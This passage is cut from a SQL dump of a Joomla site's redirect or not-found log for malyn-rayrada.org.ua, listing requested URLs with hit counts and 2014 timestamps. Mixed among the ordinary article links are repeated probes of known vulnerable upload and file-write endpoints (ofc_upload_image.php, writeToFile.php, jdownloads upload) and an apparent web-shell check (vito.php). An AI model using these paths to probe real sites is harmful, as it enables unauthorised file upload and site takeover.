16:30:32','0000-00-00 00:00:00',301),(5470,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53:--25102013-&Itemid=94&lang=uk','','','',4,0,'2014-09-28 16:34:17','0000-00-00 00:00:00',301),(5471,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56&Itemid=97&lang=ru','','','',5,0,'2014-09-28 16:35:47','0000-00-00 00:00:00',301),(5472,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-28 16:38:41','0000-00-00 00:00:00',301),(5473,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56:--03022014-&Itemid=97&lang=en','','','',5,0,'2014-09-28 16:39:18','0000-00-00 00:00:00',301),(5474,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53&Itemid=94&lang=uk','','','',9,0,'2014-09-28 16:39:39','0000-00-00 00:00:00',301),(5475,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53&Itemid=94&lang=uk','','','',2,0,'2014-09-28 16:46:50','0000-00-00 00:00:00',301),(5476,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-28 16:46:56','0000-00-00 00:00:00',301),(5477,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-09-28 16:47:43','0000-00-00 00:00:00',301),(5478,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=912:2013-01-22-14-14-06&lang=ru&option=com_content&view=article','','','',4,0,'2014-09-28 16:50:45','0000-00-00 00:00:00',301),(5479,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1007:-4-&lang=en&option=com_content&view=article','','','',10,0,'2014-09-28 16:51:00','0000-00-00 00:00:00',301),(5480,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53:--25102013-&Itemid=94&lang=ru','','','',8,0,'2014-09-28 16:52:13','0000-00-00 00:00:00',301),(5481,'http://malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',3,0,'2014-09-28 16:55:15','0000-00-00 00:00:00',301),(5482,'http://malyn-rayrada.org.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',3,0,'2014-09-28 16:55:20','0000-00-00 00:00:00',301),(5483,'http://malyn-rayrada.org.ua/components/com_community/index.html','','','',118,0,'2014-09-28 16:55:23','0000-00-00 00:00:00',301),(5484,'http://malyn-rayrada.org.ua/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',6,0,'2014-09-28 16:55:27','0000-00-00 00:00:00',301),(5485,'http://malyn-rayrada.org.ua/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',6,0,'2014-09-28 16:55:30','0000-00-00 00:00:00',301),(5486,'http://malyn-rayrada.org.ua/docs/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',2,0,'2014-09-28 16:55:37','0000-00-00 00:00:00',301),(5487,'http://malyn-rayrada.org.ua/docs/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',2,0,'2014-09-28 16:55:41','0000-00-00 00:00:00',301),(5488,'http://malyn-rayrada.org.ua/docs/components/com_community/index.html','','','',2,0,'2014-09-28 16:55:45','0000-00-00 00:00:00',301),(5489,'http://malyn-rayrada.org.ua/docs/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',2,0,'2014-09-28 16:55:50','0000-00-00 00:00:00',301),(5490,'http://malyn-rayrada.org.ua/docs/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',2,0,'2014-09-28 16:55:56','0000-00-00 00:00:00',301),(5491,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-28 17:10:45','0000-00-00 00:00:00',301),(5492,'http://www.malyn-rayrada.org.ua/k/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-28 17:18:11','0000-00-00 00:00:00',301),(5493,'http://www.malyn-rayrada.org.ua/k/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-28 17:18:15','0000-00-00 00:00:00',301),(5494,'http://www.malyn-rayrada.org.ua/k/components/com_community/index.html','','','',1,0,'2014-09-28 17:18:20','0000-00-00 00:00:00',301),(5495,'http://www.malyn-rayrada.org.ua/k/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-28 17:18:23','0000-00-00 00:00:00',301),(5496,'http://www.malyn-rayrada.org.ua/k/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-28 17:18:29','0000-00-00 00:00:00',301),(5497,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53:--25102013-&Itemid=94&lang=uk','','','',5,0,'2014-09-28 17:34:04','0000-00-00 00:00:00',301),(5498,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51&Itemid=92&lang=en','','','',2,0,'2014-09-28 17:47:28','0000-00-00 00:00:00',301),(5499,'http://malyn-rayrada.org.ua/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',72,0,'2014-09-28 18:01:20','0000-00-00 00:00:00',301),(5500,'http://malyn-rayrada.org.ua/teksti/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-28 18:01:22','0000-00-00 00:00:00',301),(5501,'http://malyn-rayrada.org.ua/teksti/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-28 18:01:26','0000-00-00 00:00:00',301),(5502,'http://malyn-rayrada.org.ua/teksti/components/com_community/index.html','','','',1,0,'2014-09-28 18:01:29','0000-00-00 00:00:00',301),(5503,'http://malyn-rayrada.org.ua/teksti/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-28 18:01:32','0000-00-00 00:00:00',301),(5504,'http://malyn-rayrada.org.ua/teksti/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-28 18:01:37','0000-00-00 00:00:00',301),(5505,'http://malyn-rayrada.org.ua/teksti/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-09-28 18:01:43','0000-00-00 00:00:00',301),(5506,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51:--19072013-&Itemid=92&lang=en','','','',2,0,'2014-09-28 18:15:51','0000-00-00 00:00:00',301),(5507,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47&Itemid=86&lang=ru','','','',4,0,'2014-09-28 18:18:40','0000-00-00 00:00:00',301),(5508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-28 18:25:34','0000-00-00 00:00:00',301),(5509,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=955:2013-03-07-06-31-04&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-28 18:25:35','0000-00-00 00:00:00',301),(5510,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=en','','','',2,0,'2014-09-28 18:33:26','0000-00-00 00:00:00',301),(5511,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=uk','','','',2,0,'2014-09-28 18:35:41','0000-00-00 00:00:00',301),(5512,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=uk','','','',2,0,'2014-09-28 18:40:11','0000-00-00 00:00:00',301),(5513,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-28 18:44:52','0000-00-00 00:00:00',301),(5514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-28 18:47:23','0000-00-00 00:00:00',301),(5515,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-28 18:49:38','0000-00-00 00:00:00',301),(5516,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=ru','','','',3,0,'2014-09-28 19:04:35','0000-00-00 00:00:00',301),(5517,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=ru','','','',2,0,'2014-09-28 19:04:39','0000-00-00 00:00:00',301),(5518,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=ru','','','',3,0,'2014-09-28 19:10:08','0000-00-00 00:00:00',301),(5519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-28 19:10:11','0000-00-00 00:00:00',301),(5520,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-28 19:15:00','0000-00-00 00:00:00',301),(5521,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-28 19:35:22','0000-00-00 00:00:00',301),(5522,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-28 19:37:06','0000-00-00 00:00:00',301),(5523,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&id=4&lang=uk&option=com_phocagallery&view=category','','','',1,0,'2014-09-28 19:42:54','0000-00-00 00:00:00',301),(5524,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-28 19:50:55','0000-00-00 00:00:00',301),(5525,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1238:2014-03-09-06-41-00&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-09-28 19:57:30','0000-00-00 00:00:00',301),(5526,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1039:-l-r&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-28 19:59:39','0000-00-00 00:00:00',301),(5527,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1181:2014-01-22-06-06-13&lang=ru&option=com_content&view=article','','','',5,0,'2014-09-28 19:59:43','0000-00-00 00:00:00',301),(5528,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1021:-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2014-09-28 19:59:53','0000-00-00 00:00:00',301),(5529,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&catid=55&id=1169:2014-01-08-07-30-47&lang=ru&option=com_content&view=article','','','',3,0,'2014-09-28 19:59:56','0000-00-00 00:00:00',301),(5530,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1080:-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-28 19:59:58','0000-00-00 00:00:00',301),(5531,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-28 20:06:29','0000-00-00 00:00:00',301),(5532,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-28 20:10:48','0000-00-00 00:00:00',301),(5533,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53&Itemid=94&lang=ru','','','',8,0,'2014-09-28 20:35:44','0000-00-00 00:00:00',301),(5534,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-28 20:52:29','0000-00-00 00:00:00',301),(5535,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-28 21:00:40','0000-00-00 00:00:00',301),(5536,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-28 21:05:25','0000-00-00 00:00:00',301),(5537,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=982:2013-04-03-11-58-18&lang=ru&option=com_content&view=article','','','',3,0,'2014-09-28 21:34:39','0000-00-00 00:00:00',301),(5538,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=981:2013-04-03-07-23-01&lang=en&option=com_content&view=article','','','',2,0,'2014-09-28 21:34:53','0000-00-00 00:00:00',301),(5539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58:--30042014-&Itemid=105&lang=ru','','','',9,0,'2014-09-28 22:00:51','0000-00-00 00:00:00',301),(5540,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58&Itemid=105&lang=uk','','','',4,0,'2014-09-28 22:02:40','0000-00-00 00:00:00',301),(5541,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',6,0,'2014-09-28 22:06:29','0000-00-00 00:00:00',301),(5542,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=58&Itemid=105&lang=uk','','','',2,0,'2014-09-28 22:06:30','0000-00-00 00:00:00',301),(5543,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49&Itemid=88&lang=ru','','','',6,0,'2014-09-28 22:06:35','0000-00-00 00:00:00',301),(5544,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58&Itemid=105&lang=uk','','','',1,0,'2014-09-28 22:22:15','0000-00-00 00:00:00',301),(5545,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=58&Itemid=105&lang=uk','','','',2,0,'2014-09-28 22:22:20','0000-00-00 00:00:00',301),(5546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58&Itemid=105&lang=ru','','','',4,0,'2014-09-28 22:27:29','0000-00-00 00:00:00',301),(5547,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10&Itemid=17&lang=uk','','','',6,0,'2014-09-28 22:36:08','0000-00-00 00:00:00',301),(5548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=58:--30042014-&Itemid=105&lang=ru','','','',12,0,'2014-09-28 22:37:39','0000-00-00 00:00:00',301),(5549,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58&Itemid=105&lang=uk','','','',2,0,'2014-09-28 22:38:51','0000-00-00 00:00:00',301),(5550,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1304:2014-04-30-09-11-23&catid=58&Itemid=105&lang=en','','','',3,0,'2014-09-28 22:39:57','0000-00-00 00:00:00',301),(5551,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58&Itemid=105&lang=uk','','','',2,0,'2014-09-28 22:40:59','0000-00-00 00:00:00',301),(5552,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58:--30042014-&Itemid=105&lang=uk','','','',4,0,'2014-09-28 22:46:40','0000-00-00 00:00:00',301),(5553,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=58:--30042014-&Itemid=105&lang=uk','','','',3,0,'2014-09-28 22:52:25','0000-00-00 00:00:00',301),(5554,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-28 22:56:49','0000-00-00 00:00:00',301),(5555,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-28 22:59:56','0000-00-00 00:00:00',301),(5556,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10&Itemid=17&lang=ru','','','',7,0,'2014-09-28 23:02:20','0000-00-00 00:00:00',301),(5557,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58:--30042014-&Itemid=105&lang=ru','','','',3,0,'2014-09-28 23:03:35','0000-00-00 00:00:00',301),(5558,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:--------lr---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-09-28 23:06:46','0000-00-00 00:00:00',301),(5559,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58:--30042014-&Itemid=105&lang=uk','','','',3,0,'2014-09-28 23:07:00','0000-00-00 00:00:00',301),(5560,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=910:-22-&lang=en&option=com_content&view=article','','','',4,0,'2014-09-28 23:08:38','0000-00-00 00:00:00',301),(5561,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1304:2014-04-30-09-11-23&catid=58:--30042014-&Itemid=105&lang=en','','','',3,0,'2014-09-28 23:08:41','0000-00-00 00:00:00',301),(5562,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1047:2013-07-10-05-51-36&lang=ru&option=com_content&view=article','','','',3,0,'2014-09-28 23:08:47','0000-00-00 00:00:00',301),(5563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=58&Itemid=105&lang=ru','','','',4,0,'2014-09-28 23:12:12','0000-00-00 00:00:00',301),(5564,'http://www.malyn-rayrada.org.ua/suomikuvasto/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-28 23:20:06','0000-00-00 00:00:00',301),(5565,'http://www.malyn-rayrada.org.ua/suomikuvasto/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-28 23:20:10','0000-00-00 00:00:00',301),(5566,'http://www.malyn-rayrada.org.ua/suomikuvasto/components/com_community/index.html','','','',1,0,'2014-09-28 23:20:14','0000-00-00 00:00:00',301),(5567,'http://www.malyn-rayrada.org.ua/suomikuvasto/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-28 23:20:17','0000-00-00 00:00:00',301),(5568,'http://www.malyn-rayrada.org.ua/suomikuvasto/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-28 23:20:21','0000-00-00 00:00:00',301),(5569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:--------lr---&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-09-28 23:24:17','0000-00-00 00:00:00',301),(5570,'http://www.malyn-rayrada.org.ua/images/stories/vito.php?rf','','','',6,0,'2014-09-28 23:25:02','0000-00-00 00:00:00',301),(5571,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',3,0,'2014-09-28 23:41:06','0000-00-00 00:00:00',301),(5572,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58&Itemid=105&lang=ru','','','',2,0,'2014-09-28 23:51:23','0000-00-00 00:00:00',301),(5573,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10&Itemid=17&lang=ru','','','',4,0,'2014-09-28 23:55:02','0000-00-00 00:00:00',301),(5574,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=uk','','','',2,0,'2014-09-29 00:00:45','0000-00-00 00:00:00',301),(5575,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=ru','','','',2,0,'2014-09-29 00:04:55','0000-00-00 00:00:00',301),(5576,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=58:--30042014-&Itemid=105&lang=ru','','','',3,0,'2014-09-29 00:07:22','0000-00-00 00:00:00',301),(5577,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',2,0,'2014-09-29 00:09:29','0000-00-00 00:00:00',301),(5578,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=58&Itemid=105&lang=ru','','','',3,0,'2014-09-29 00:33:09','0000-00-00 00:00:00',301),(5579,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-29 00:33:20','0000-00-00 00:00:00',301),(5580,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 00:36:59','0000-00-00 00:00:00',301),(5581,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58&Itemid=105&lang=ru','','','',4,0,'2014-09-29 00:40:40','0000-00-00 00:00:00',301),(5582,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=uk','','','',5,0,'2014-09-29 00:46:15','0000-00-00 00:00:00',301),(5583,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=57&Itemid=98&lang=en','','','',6,0,'2014-09-29 00:47:30','0000-00-00 00:00:00',301),(5584,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=ru','','','',5,0,'2014-09-29 00:50:08','0000-00-00 00:00:00',301),(5585,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-29 01:00:21','0000-00-00 00:00:00',301),(5586,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32:2011-03-31-12-03-04&Itemid=64&lang=ru','','','',14,0,'2014-09-29 01:02:26','0000-00-00 00:00:00',301),(5587,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=ru','','','',2,0,'2014-09-29 01:58:05','0000-00-00 00:00:00',301),(5588,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-29 01:58:24','0000-00-00 00:00:00',301),(5589,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=uk','','','',3,0,'2014-09-29 01:59:03','0000-00-00 00:00:00',301),(5590,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=uk','','','',2,0,'2014-09-29 02:02:15','0000-00-00 00:00:00',301),(5591,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=ru','','','',2,0,'2014-09-29 02:02:18','0000-00-00 00:00:00',301),(5592,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1352:2014-06-26-06-51-20&tmpl=component&print=1&layout=default&page=&lang=uk','','','',4,0,'2014-09-29 02:17:40','0000-00-00 00:00:00',301),(5593,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1023:-l-28r-&lang=ru&option=com_content&view=article','','','',5,0,'2014-09-29 02:18:32','0000-00-00 00:00:00',301),(5594,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56&Itemid=97&lang=uk','','','',3,0,'2014-09-29 02:24:43','0000-00-00 00:00:00',301),(5595,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 02:30:59','0000-00-00 00:00:00',301),(5596,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10&Itemid=17&lang=uk','','','',8,0,'2014-09-29 02:49:18','0000-00-00 00:00:00',301),(5597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&lang=uk','','','',5,0,'2014-09-29 02:58:50','0000-00-00 00:00:00',301),(5598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-29 03:01:13','0000-00-00 00:00:00',301),(5599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 03:17:40','0000-00-00 00:00:00',301),(5600,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',4,0,'2014-09-29 03:20:49','0000-00-00 00:00:00',301),(5601,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56:--03022014-&Itemid=97&lang=uk','','','',5,0,'2014-09-29 03:27:21','0000-00-00 00:00:00',301),(5602,'http://www.malyn-rayrada.org.ua/clip/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-29 03:31:37','0000-00-00 00:00:00',301),(5603,'http://www.malyn-rayrada.org.ua/clip/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-29 03:31:41','0000-00-00 00:00:00',301),(5604,'http://www.malyn-rayrada.org.ua/clip/components/com_community/index.html','','','',1,0,'2014-09-29 03:31:44','0000-00-00 00:00:00',301),(5605,'http://www.malyn-rayrada.org.ua/clip/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-29 03:31:48','0000-00-00 00:00:00',301),(5606,'http://www.malyn-rayrada.org.ua/clip/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-29 03:31:51','0000-00-00 00:00:00',301),(5607,'http://www.malyn-rayrada.org.ua/clip/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-09-29 03:31:57','0000-00-00 00:00:00',301),(5608,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-29 03:34:10','0000-00-00 00:00:00',301),(5609,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10&Itemid=17&lang=ru','','','',2,0,'2014-09-29 03:36:23','0000-00-00 00:00:00',301),(5610,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=uk','','','',5,0,'2014-09-29 03:43:41','0000-00-00 00:00:00',301),(5611,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-29 03:45:18','0000-00-00 00:00:00',301),(5612,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=uk','','','',5,0,'2014-09-29 03:48:27','0000-00-00 00:00:00',301),(5613,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-29 03:50:17','0000-00-00 00:00:00',301),(5614,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10&Itemid=17&lang=ru','','','',3,0,'2014-09-29 03:52:53','0000-00-00 